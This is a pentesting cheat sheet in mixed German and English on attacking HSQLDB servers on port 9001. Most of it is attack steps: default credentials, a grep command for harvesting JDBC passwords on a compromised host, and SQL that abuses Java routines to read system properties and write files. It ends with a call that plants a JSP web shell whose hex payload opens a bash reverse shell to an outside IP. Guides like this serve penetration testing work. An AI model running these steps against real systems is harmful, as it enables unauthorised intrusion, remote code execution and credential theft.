9001 - Pentesting HSQLDB

Grundinformationen

HSQLDB (HyperSQL DataBase) ist das führende SQL-relationales Datenbanksystem, das in Java geschrieben ist. Es bietet eine kleine, schnelle, mehrthreadige und transaktionale Datenbank-Engine mit In-Memory- und festplattenbasierten Tabellen und unterstützt eingebettete und Servermodi.

Standardport: 9001

9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)

Information

Standard-Einstellungen

Beachten Sie, dass dieser Dienst standardmäßig wahrscheinlich im Speicher läuft oder an localhost gebunden ist. Wenn Sie ihn gefunden haben, haben Sie wahrscheinlich einen anderen Dienst ausgenutzt und versuchen, die Berechtigungen zu erhöhen.

Die Standardanmeldeinformationen sind normalerweise sa mit einem leeren Passwort.

Wenn Sie einen anderen Dienst ausgenutzt haben, suchen Sie nach möglichen Anmeldeinformationen mit

grep -rP 'jdbc:hsqldb.*password.*' /path/to/search

Note the database name carefully - you’ll need it to connect.

Info Gathering

Connect to the DB instance by downloading HSQLDB and extracting hsqldb/lib/hsqldb.jar. Run the GUI app (eww) using java -jar hsqldb.jar and connect to the instance using the discovered/weak credentials.

Beachten Sie, dass die Verbindungs-URL für ein entferntes System ungefähr so aussieht: jdbc:hsqldb:hsql://ip/DBNAME.

Tricks

Java Language Routines

We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.

JRTs can be functions or procedures. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the VALUES statement.

Wenn die Java-Methode, die wir aufrufen möchten, void zurückgibt, müssen wir eine Prozedur verwenden, die mit der CALL-Anweisung aufgerufen wird.

Reading Java System Properties

Create function:

CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

Funktion ausführen:

VALUES(getsystemproperty('user.name'))

You can find a list of system properties here.

Write Content to File

Sie können das Java-Gadget com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename verwenden, das im JDK (automatisch in den Klassenpfad der Anwendung geladen) enthalten ist, um hexadezimal codierte Elemente über ein benutzerdefiniertes Verfahren auf die Festplatte zu schreiben. Beachten Sie die maximale Größe von 1024 Bytes.

Create procedure:

CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

Führen Sie das Verfahren aus:

call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))